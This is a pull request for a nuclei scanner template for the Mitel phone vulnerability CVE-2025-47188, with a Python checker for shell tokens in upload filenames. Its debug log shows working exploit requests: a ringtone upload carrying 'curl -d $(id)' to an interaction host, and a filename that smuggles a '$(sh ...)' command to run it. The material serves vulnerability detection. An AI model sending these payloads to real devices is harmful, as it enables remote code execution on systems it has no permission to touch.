
Conversation

@matejsmycka (Contributor) commented Oct 1, 2025

Template / PR Information

Maybe this could be rewritten as a Network template, since it targets 49249.

nuclei -t mitel.yaml -u <REDACTED>:49249 -debug

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.10

		projectdiscovery.io

[INF] Current nuclei version: v3.4.10 (latest)
[INF] Current nuclei-templates version: v10.2.9 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 182
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] Running httpx on input host
[INF] Found 1 URL from httpx
[INF] Using Interactsh Server: oast.live
[INF] [CVE-2025-47188] Dumped HTTP request for http://<REDACTED>:49249/cgi-bin/webconfig?page=upload_ringtone&action=submit&section=0&conn=0

POST /cgi-bin/webconfig?page=upload_ringtone&action=submit&section=0&conn=0 HTTP/1.1
Host: <REDACTED>:49249
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Connection: close
Content-Length: 278
Content-Type: multipart/form-data; boundary=----0ba2fc3a8c91370bd74c5f7ab65fda3f
Accept-Encoding: gzip

------0ba2fc3a8c91370bd74c5f7ab65fda3f
Content-Disposition: form-data; name="upload_ringtone/newfile"; filename="y4coTge0.txt"

RIFF$WAVEfmt D��Xdata
curl -d $(id) d3em5vr052qsadtl3ueg6tqwoeqkeio6h.oast.live
------0ba2fc3a8c91370bd74c5f7ab65fda3f--
[DBG] [CVE-2025-47188] Dumped HTTP response http://<REDACTED>:49249/cgi-bin/webconfig?page=upload_ringtone&action=submit&section=0&conn=0

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html

<!DOCTYPE html>
<html><head><meta http-equiv="refresh" content="0; url=http://<REDACTED>/ringtone.html?success=0" /></head><body></body></html>
[d3em5vr052qsadtl3ueg6tqwoeqkeio6h] Received DNS interaction from 147.251.4.41 at 2025-10-01 17:21:06
------------
DNS Request
------------

;; opcode: QUERY, status: NOERROR, id: 27464
;; flags:; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 0

;; QUESTION SECTION:
;d3em5vr052qsadtl3ueg6tqwoeqkeio6h.oast.live.	IN	 A



------------
DNS Response
------------

;; opcode: QUERY, status: NOERROR, id: 27464
;; flags: qr aa; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 2

;; QUESTION SECTION:
;d3em5vr052qsadtl3ueg6tqwoeqkeio6h.oast.live.	IN	 A

;; ANSWER SECTION:
d3em5vr052qsadtl3ueg6tqwoeqkeio6h.oast.live.	3600	IN	A	178.128.210.172

;; AUTHORITY SECTION:
d3em5vr052qsadtl3ueg6tqwoeqkeio6h.oast.live.	3600	IN	NS	ns1.oast.live.
d3em5vr052qsadtl3ueg6tqwoeqkeio6h.oast.live.	3600	IN	NS	ns2.oast.live.

;; ADDITIONAL SECTION:
ns1.oast.live.	3600	IN	A	178.128.210.172
ns2.oast.live.	3600	IN	A	178.128.210.172


[CVE-2025-47188:word-1] [http] [critical] http://<REDACTED>:49249/cgi-bin/webconfig?page=upload_ringtone&action=submit&section=0&conn=0
[INF] [CVE-2025-47188] Dumped HTTP request for http://<REDACTED>:49249/cgi-bin/webconfig?page=upload_ringtone&action=submit&section=1&conn=0

POST /cgi-bin/webconfig?page=upload_ringtone&action=submit&section=1&conn=0 HTTP/1.1
Host: <REDACTED>:49249
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
Connection: close
Content-Length: 255
Content-Type: multipart/form-data; boundary=----0ba2fc3a8c91370bd74c5f7ab65fda3f
Accept-Encoding: gzip

------0ba2fc3a8c91370bd74c5f7ab65fda3f
Content-Disposition: form-data; name="upload_ringtone/newfile"; filename="fake$(sh ${HOME}userdata${HOME}ringtone${HOME}y4coTge0.txt).wav"


This is an invalid WAV file
------0ba2fc3a8c91370bd74c5f7ab65fda3f--
[WRN] [CVE-2025-47188] Could not execute request for <REDACTED>:49249: cause="net/http: timeout awaiting response headers" chain="got err while executing http://<REDACTED>:49249/cgi-bin/webconfig?page=upload_ringtone&action=submit&section=1&conn=0"
[INF] Scan completed in 28.669099673s. 1 matches found.

Template Validation

I've validated this template locally?

  • YES
  • NO

Additional Details (leave it blank if not applicable)

Additional References:

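The two captured requests above show the mechanism a defender needs to check for: a multipart upload whose filename parameter is later handed to a shell, so a name such as `fake$(...).wav` becomes a command. The following is an added example, not code from the PR, the nuclei template or the Mitel firmware. It parses a multipart/form-data body, extracts every filename parameter, and reports both whether a strict allow-list would have accepted the name and which shell tokens it carries. The boundary value is the one from the capture; the two sample bodies are constructed here, with the injected command replaced by a placeholder path, and the allowed extension set (`.wav`, `.txt`) is an assumption.

```python
"""
Defender-side check for the ringtone-upload path captured above.
Added example, not from the PR or the template. Parses a multipart body,
pulls out every filename= parameter and scores it two ways:
  - allow-list: what a hardened upload handler should require, and
  - indicators: shell tokens of the kind seen in the second request.
"""
import re

# Boundary value taken from the captured request on the page
BOUNDARY = "----0ba2fc3a8c91370bd74c5f7ab65fda3f"

# Strict allow-list: alphanumeric start, limited charset, bounded length,
# fixed extension set. Extension set is an assumption for this example.
SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,63}\.(?:wav|txt)$", re.IGNORECASE)

# Tokens that change meaning inside an unquoted shell word; detection only
SHELL_TOKENS = ("$(", "`", "${", ";", "|", "&", ">", "<", "\n")

_DISPOSITION = re.compile(
    r"^Content-Disposition:\s*form-data;(?P<params>.*)$", re.IGNORECASE | re.MULTILINE
)
_FILENAME = re.compile(r'filename="((?:[^"\\]|\\.)*)"')


def extract_filenames(body: str, boundary: str) -> list[str]:
    """Return every filename= parameter in the multipart body, in order."""
    names = []
    for part in body.split("--" + boundary)[1:]:
        if part.startswith("--"):  # closing delimiter, nothing after it
            break
        headers = part.split("\r\n\r\n", 1)[0]
        m = _DISPOSITION.search(headers)
        if not m:
            continue
        fm = _FILENAME.search(m.group("params"))
        if fm:
            names.append(fm.group(1))
    return names


def shell_indicators(name: str) -> list[str]:
    """Shell tokens present in a filename (empty list means none found)."""
    return [t for t in SHELL_TOKENS if t in name]


def is_safe_filename(name: str) -> bool:
    """Allow-list check a hardened upload handler should enforce up front."""
    return SAFE_NAME.fullmatch(name) is not None


def assess_body(body: str, boundary: str = BOUNDARY) -> dict:
    """Summarise a captured body: per-filename verdict plus an overall alert flag."""
    findings = []
    for name in extract_filenames(body, boundary):
        findings.append({
            "filename": name,
            "allowed": is_safe_filename(name),
            "indicators": shell_indicators(name),
        })
    return {"findings": findings, "alert": any(f["indicators"] for f in findings)}


# Constructed sample bodies (same shape as the captured requests)
BENIGN_BODY = (
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="upload_ringtone/newfile"; filename="office_ring.wav"\r\n'
    "\r\n"
    "RIFF....WAVEfmt \r\n"
    f"--{BOUNDARY}--\r\n"
)
SUSPICIOUS_BODY = (
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="upload_ringtone/newfile"; '
    'filename="fake$(sh /PLACEHOLDER/y4coTge0.txt).wav"\r\n'  # command path is a placeholder
    "\r\n"
    "This is an invalid WAV file\r\n"
    f"--{BOUNDARY}--\r\n"
)

if __name__ == "__main__":
    for label, body in (("benign", BENIGN_BODY), ("suspicious", SUSPICIOUS_BODY)):
        print(label, assess_body(body))
```

The allow-list is the control that matters on the device side: reject anything that does not match before the name reaches the filesystem or a command line, and never build a shell string from it. The indicator list is only useful for triage of captured traffic, since an attacker-controlled name can be encoded many ways; an access-log rule on `POST /cgi-bin/webconfig?page=upload_ringtone&action=submit` from unexpected sources complements it.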
@matejsmycka (Contributor, Author)

Tested on 40+ devices
